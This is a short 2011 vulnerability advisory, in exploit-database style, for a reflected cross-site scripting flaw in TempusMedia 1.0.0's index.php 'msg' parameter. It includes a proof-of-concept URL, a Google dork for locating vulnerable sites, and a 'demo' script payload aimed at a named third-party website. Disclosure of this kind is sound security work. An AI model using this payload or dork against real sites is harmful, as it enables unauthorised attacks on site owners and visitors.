Tempus Media 1.0.0 Cross Site Scripting

`# Exploit Title: TempusMedia (index.php) Cross-site scripting Vulnerability  
# Date: 2011-07-08  
# Author: Net.Edit0r  
# Software Link: http://www.tempusmedia.com/  
# Version : 1.0.0  
# Tested on: ubuntu 11.04  
# CVE : -  
  
-----------------------------------------------------------------------------------------  
TempusMedia (index.php) Cross-site scripting Vulnerability => XSS Vulnerability  
-----------------------------------------------------------------------------------------  
  
Author : Net.Edit0r  
Date : 2011-07-08  
Location : Iran  
Web : http://Black-Hg.Org  
Critical Lvl : Medium  
Where : [ webapps ]  
My Group : Black Hat Group #BHG  
---------------------------------------------------------------------------  
  
  
  
PoC/Exploit:  
~~~~~~~~~~  
  
~ [PoC] ~: [ index.php?msg=Xss ]  
  
~ [PoC] ~: Http://[victim]/path-to-wp/index.php?msg=[Xss]  
  
  
Dork:  
~~~~~  
Google : Powered By: TempusMedia  
  
  
Demo URL:  
~~~~~~~~~  
- http://www.bonethefish.com/index.php?msg="><script>alert(100000)</script>  
  
  
  
Timeline:  
~~~~~~~~~  
- 05 - 07 - 2011 bug found.  
- 07 - 07 - 2011 vendor contacted, but no response.  
- 07 - 07 - 2011 Advisories release.  
  
Contact:  
~~~~~~~~~  
[email protected] ~ [email protected]  
  
---------------------------------------------------------------------------  
Greetz To :DarkCoder | Amir-MaGiC | H3x | D3adlY | _AttAcK_ |Dr.Nil0  
  
Spical Th4nks: B3hz4d | M4Hd1 | Cru3l.b0y | Mikili | HUrr!c4nE  
  
Web Greetz :http://Black-Hg.Org & http://mn-team.net/ & http://pentesters.ir/  
  
[!] Persian Gulf 4 Ever  
[!] I Love Iran And All Iranian People  
-------------------------------- [ EOF ] ----------------------------------  
`